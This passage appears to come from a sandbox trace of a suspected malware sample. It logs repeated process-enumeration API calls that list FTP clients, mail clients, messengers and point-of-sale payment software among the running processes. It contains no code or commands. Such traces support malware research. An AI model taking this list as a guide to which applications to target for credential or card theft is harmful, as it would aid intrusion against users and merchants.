lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0238.966] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0238.968] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0238.970] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0238.972] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0238.975] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0238.977] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0238.979] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0238.982] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0238.985] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0238.987] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0239.010] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0239.012] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0239.015] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0239.017] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0239.020] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0239.022] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0239.025] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0239.027] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0239.029] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0239.031] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0239.033] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0239.035] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0239.037] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0239.049] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0239.052] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0239.113] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0239.116] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0239.119] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0239.122] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0239.124] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0239.126] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0239.128] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0239.130] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0239.132] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0239.134] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0239.136] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0239.138] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0239.140] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0239.142] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0239.144] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0239.298] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0239.301] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0239.303] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0239.306] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0239.308] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0239.310] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0239.312] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0239.314] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0239.316] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0239.318] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0239.320] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0239.321] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0239.324] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0239.325] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0239.327] CloseHandle (hObject=0x229c) returned 1 [0239.327] Sleep (dwMilliseconds=0x64) [0239.435] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2280 [0239.453] Process32First (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0239.455] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0239.456] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0239.458] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0239.460] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0239.462] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0239.464] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0239.467] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0239.469] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0239.471] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.473] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.475] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0239.480] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.481] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.483] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.484] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.486] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.488] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.490] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.492] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0239.494] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0239.495] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0239.497] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0239.499] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.501] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0239.503] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0239.504] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0239.507] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0239.510] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0239.511] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, 